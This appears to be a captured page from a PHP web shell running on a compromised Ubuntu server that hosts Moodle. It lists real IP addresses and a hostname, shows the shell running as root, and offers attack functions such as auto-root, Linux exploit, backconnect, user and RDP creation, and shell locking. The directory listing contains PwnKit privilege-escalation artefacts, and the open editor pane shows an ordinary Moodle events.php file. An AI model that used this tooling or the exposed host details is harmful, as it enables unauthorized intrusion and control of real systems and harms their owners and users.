Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lib /
db /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
access.php
53.63
KB
-rwxrwxrwx
caches.php
8.88
KB
-rwxrwxrwx
events.php
5.42
KB
-rwxrwxrwx
index.html
1
B
-rwxrwxrwx
install.php
14.77
KB
-rwxrwxrwx
install.xml
239.49
KB
-rwxrwxrwx
log.php
4.51
KB
-rwxrwxrwx
messages.php
2.64
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
services.php
35.56
KB
-rwxrwxrwx
upgrade.php
93.43
KB
-rwxrwxrwx
upgradelib.php
6.98
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : events.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Definition of core event handler and description of all events throws from core. * * The handlers defined on this file are processed and registered into * the Moodle DB after any install or upgrade operation. All plugins * support this. * * For more information, take a look to the documentation available: * - Events API: {@link http://docs.moodle.org/dev/Events_API} * - Upgrade API: {@link http://docs.moodle.org/dev/Upgrade_API} * * @package core * @category event * @copyright 2007 onwards Martin Dougiamas http://dougiamas.com * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); /* List of handlers */ $handlers = array( /* * portfolio queued event - for non interactive file transfers * NOTE: this is a HACK, please do not add any more things like this here * (it is just abusing cron to do very time consuming things which is wrong any way) * * TODO: this has to be moved into separate queueing framework.... */ 'portfolio_send' => array ( 'handlerfile' => '/lib/portfolio.php', 'handlerfunction' => 'portfolio_handle_event', // argument to call_user_func(), could be an array 'schedule' => 'cron', 'internal' => 0, ), 'course_completed' => array ( 'handlerfile' => '/lib/badgeslib.php', 'handlerfunction' => 'badges_award_handle_course_criteria_review', 'schedule' => 'instant', 'internal' => 1, ), 'activity_completion_changed' => array ( 'handlerfile' => '/lib/badgeslib.php', 'handlerfunction' => 'badges_award_handle_activity_criteria_review', 'schedule' => 'instant', 'internal' => 1, ), 'user_updated' => array ( 'handlerfile' => '/lib/badgeslib.php', 'handlerfunction' => 'badges_award_handle_profile_criteria_review', 'schedule' => 'instant', 'internal' => 1, ), /* no more here please, core should not consume any events!!!!!!! */ ); /* List of events thrown from Moodle core ==== user related events ==== user_created - object user table record user_updated - object user table record user_deleted - object user table record user_logout - full $USER object ==== course related events ==== course_category_updated - object course_categories table record course_category_created - object course_categories table record course_category_deleted - object course_categories table record course_created - object course table record course_updated - object course table record course_content_removed - object course table record + context property course_deleted - object course table record + context property course_restored - custom object with courseid, userid and restore information user_enrolled - object record from user_enrolments table + courseid,enrol user_enrol_modified - object record from user_enrolments table + courseid,enrol user_unenrolled - object record from user_enrolments table + courseid,enrol,lastenrol ==== cohort related events === cohort_added - object cohort table record cohort_updated - object cohort table record cohort_deleted - object cohort table record cohort_member_added - object cohortid, userid properties cohort_member_removed - object cohortid, userid properties ==== group related events ==== groups_group_created - object groups_group table record groups_group_updated - object groups_group table record groups_group_deleted - object groups_group table record groups_member_added - object userid, groupid properties groups_member_removed - object userid, groupid properties groups_grouping_created - object groups_grouping table record groups_grouping_updated - object groups_grouping table record groups_grouping_deleted - object groups_grouping table record groups_members_removed - object courseid+userid - removed all users (or one user) from all groups in course groups_groupings_groups_removed - int course id - removed all groups from all groupings in course groups_groups_deleted - int course id - deleted all course groups groups_groupings_deleted - int course id - deleted all course groupings ==== role related events ==== role_assigned - object role_assignments table record role_unassigned - object role_assignments table record ==== activity module events ==== mod_deleted - int courseid, int cmid, text modulename - happens when a module is deleted mod_created - int courseid, int cmid, text modulename - happens when a module is created mod_updated - int courseid, int cmid, text modulename - happens when a module is updated === blog events blog_entry_added - blog post object blog_entry_edited - blog post object blog_entry_deleteded - blog post object */
Close